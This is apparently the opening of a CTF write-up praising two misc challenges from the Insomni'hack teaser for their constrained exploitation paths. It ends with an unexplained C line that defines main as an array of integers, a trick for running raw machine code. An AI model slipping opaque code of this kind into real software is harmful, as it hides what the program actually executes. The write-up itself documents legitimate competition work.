ctfs can often have really bad misc categories. misc is known to be plagued with annoying gamey challenges and this can make a ctf pretty frustrating to play. but i can solidly say that the insomni'hack teaser wasn't one of these ctfs
both of these misc challenges were really interesting and presented novel exploitation paths that needed to work around very tight constraints. and solving them was a lot of fun
const int main[] = {15544, 268382464, 5};